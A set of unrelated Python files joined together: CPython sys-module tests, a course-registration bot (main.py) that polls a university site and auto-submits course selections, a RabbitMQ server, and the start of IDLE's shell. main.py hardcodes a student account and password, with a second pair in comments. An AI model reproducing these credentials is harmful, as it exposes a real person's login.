out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
        # has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
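        # For instance (illustrative): a version of (3, 8, 5, 'final', 0)
        # packs to 3<<24 | 8<<16 | 5<<8 | 0xF<<4 | 0 == 0x030805f0.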
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
def test_cinder_implementation(self):
self.assertTrue(hasattr(sys.implementation, '_is_cinder'))
self.assertEqual(sys.implementation._is_cinder, True)
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@test.support.requires_type_collecting
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P3P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('3P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('5P2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('13P1q'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('3Pb2PPP4PP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPPP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn3P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn3P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_method_free_list(self):
# test default initial size
self.assertEqual(256, sys._get_method_free_list_size())
# disable the cache
sys._set_method_free_list_size(0)
self.assertEqual(0, sys._get_method_free_list_size())
# invalid values
self.assertRaises(OverflowError, sys._set_method_free_list_size, -1)
self.assertRaises(TypeError, sys._set_method_free_list_size, None)
# raise the size
sys._set_method_free_list_size(512)
self.assertEqual(512, sys._get_method_free_list_size())
stats = sys._get_method_free_list_stats()
has_stats = stats[1] != -1
# Could be broken if the test framework changes to use more methods
self.assertEqual(1, stats[0])
class C:
def f(self): pass
fill_cache = [C().f for i in range(600)]
self.assertEqual(1, stats[0])
del fill_cache
# cache is now fully populated
stats = sys._get_method_free_list_stats()
self.assertEqual(512, stats[0])
# reduce size
sys._set_method_free_list_size(256)
self.assertEqual(256, sys._get_method_free_list_size())
if has_stats:
size, hits, misses = sys._get_method_free_list_stats()
C().f
size2, hits2, misses2 = sys._get_method_free_list_stats()
# cache hits are tracked
self.assertEqual(hits + 1, hits2)
[C().f for i in range(size2 + 1)]
size3, hits3, misses3 = sys._get_method_free_list_stats()
# cache misses are tracked
self.assertEqual(misses2 + 1, misses3)
@unittest.skipUnderCinderJIT(
"Assumes implementation details of a non-JIT method cache")
def test_get_method_cache_stats(self):
if sysconfig.get_config_var('Py_DEBUG') == 0:
return
cache_stats = sys._get_method_cache_stats()
self.assertIs(type(cache_stats), dict)
self.assertIn("num_hits", cache_stats)
self.assertIn("num_misses", cache_stats)
self.assertIn("num_collisions", cache_stats)
sys._reset_method_cache_stats()
class Foo:
bar = 'testing 123'
prev = sys._get_method_cache_stats()
# Should be a cache miss
for i in range(20):
getattr(Foo, 'baz' + str(i), None)
# Second access should be a cache hit
Foo.bar
Foo.bar
curr = sys._get_method_cache_stats()
self.assertGreater(curr['num_hits'], prev['num_hits'])
self.assertGreater(curr['num_misses'], prev['num_misses'])
if __name__ == "__main__":
unittest.main()
|
main.py
|
#!/usr/bin/env python3
from user import CCU_User
from course import Get_Course
#from course import Course
from debug import logger_init
from debug import Error
import time
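# one_cycle() logs in, polls the course listing pages, and submits a selection
# request for every course id listed in the "target" file that still has empty
# seats; it returns the number of successful selections as a string, or an
# Error code if a page request fails.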
def one_cycle():
#account = "407530012"
#passwd = "andy0707"
account = "407410001"
passwd = "NpFcD02-15"
user = CCU_User(account, passwd)
user.login()
#try to keep the connection
#alive_daemon = threading.Thread(target = user.stay_alive, args = "")
#alive_daemon.start()
crawler = Get_Course(user)
crawler.request_course_form(2)
course = []
sub_cate = 3
page_max = 3
with open("target", "r") as t:
target = t.readlines()
target = [i[:-1] for i in target]
counter = 0
select = 0
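    # Scan each listing page up to 100 times, submitting a request for any
    # target course with empty seats and pausing 5 seconds between passes.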
while counter < 100:
for i in range(1, page_max + 1):
courses = crawler.request_page_in_form(sub_cate, i)
if type(courses) is not list:
return Error.GET_REQUEST_FAIL
for course in courses:
print(course.course_id, target)
if (course.course_id in target) and course.empty != 0:
ret = crawler.send_submit(i, course.course_id, sub_cate)
if ret == 0:
select += 1
print("got it")
time.sleep(5)
counter += 1
user.logout()
return str(select)
def main():
logger_init(enable_debug=True)
select = 0
while(1):
select = one_cycle()
if type(select) is str:
with open("result", "w") as op:
op.write(select)
time.sleep(1)
#alive_daemon.join()
if __name__ == "__main__":
main()
|
server.py
|
from random import randint
from threading import Thread
from threading import RLock
import pika # RabbitMQ
import time
import sys
import os
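# A Server periodically reports its load to the balancer over RabbitMQ,
# receives transactions on its own queue ("S<id>"), and executes them in a
# background thread.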
class Server:
def __init__(self, id):
print(f"> Creating Server {id}.\n")
self.id = id
self.lock = RLock()
self.transactions = []
        self.total = 0 # TOTAL TRANSACTIONS RECEIVED SO FAR
self.capacity = 100
# TO CREATE A CONNECTION WITH BALANCER
self.connection = 0
self.channel = 0
# --- SEND BALANCE TO BALANCER ---
def openMsgQueue(self, queue_name):
self.connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
self.channel = self.connection.channel()
self.channel.queue_declare(queue=queue_name)
def closeMsgQueue(self):
self.connection.close()
    def updateBalance(self, servers_queue):
try:
self.openMsgQueue(servers_queue)
while(1):
time.sleep(randint(1,5))
transac = len(self.transactions)*20
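                # Report load as "S<id>#<pending work>#<capacity>", where pending
                # work is estimated as 20 units per queued transaction.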
self.channel.basic_publish(exchange='', routing_key=servers_queue, body="S" + str(self.id) + "#" + str(transac) + "#" + str(self.capacity))
except KeyboardInterrupt:
self.closeMsgQueue()
try:
sys.exit(0)
except SystemExit:
os._exit(0)
# --- SEND BALANCE TO BALANCER ---
# --- LISTEN TO BALANCER ---
def listenBalancer(self, queue_name):
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.queue_declare(queue=queue_name)
channel.basic_consume(queue=queue_name, on_message_callback=self.addTransaction)
print(f"--- Server {self.id} is waiting for Balancer messages. To exit press CTRL+C.\n")
channel.start_consuming()
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
def addTransaction(self, ch, method, properties, body):
complexity = int(body.decode('utf-8')) # "Complexity"
self.transactions.append(complexity)
self.total += 1
ch.basic_ack(delivery_tag = method.delivery_tag)
# --- LISTEN TO BALANCER ---
# --- RUN TRANSACTIONS ---
def runTransaction(self):
while(1):
transaction = 0
if len(self.transactions) > 0:
transaction = self.transactions.pop()
if transaction != 0:
print(f"--- Server {self.id} started running a Transaction of {transaction}s.\n")
time.sleep(transaction)
print(f"--- Server {self.id} ended running a Transaction of {transaction}s | Total Executed: {self.total}.\n")
# --- RUN TRANSACTIONS ---
def run(self, servers_queue):
try:
            servers_thread = Thread(target = self.updateBalance, args = (servers_queue, ))
servers_thread.start()
balancer_thread = Thread(target = self.listenBalancer, args = ("S"+str(self.id), ))
balancer_thread.start()
run_thread = Thread(target = self.runTransaction)
run_thread.start()
balancer_thread.join()
servers_thread.join()
run_thread.join()
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
pyshell.py
|
#! /usr/bin/env python3
import sys
if __name__ == "__main__":
sys.modules['idlelib.pyshell'] = sys.modules['__main__']
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
# Valid arguments for the ...Awareness call below are defined in the following.
# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx
if sys.platform == 'win32':
try:
import ctypes
PROCESS_SYSTEM_DPI_AWARE = 1 # Int required.
ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE)
except (ImportError, AttributeError, OSError):
pass
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
from textwrap import TextWrapper
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, StdInputFile, StdOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
#TODO: don't read/write this from/to .idlerc when testing
self.breakpointPath = os.path.join(
idleConf.userdir, 'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
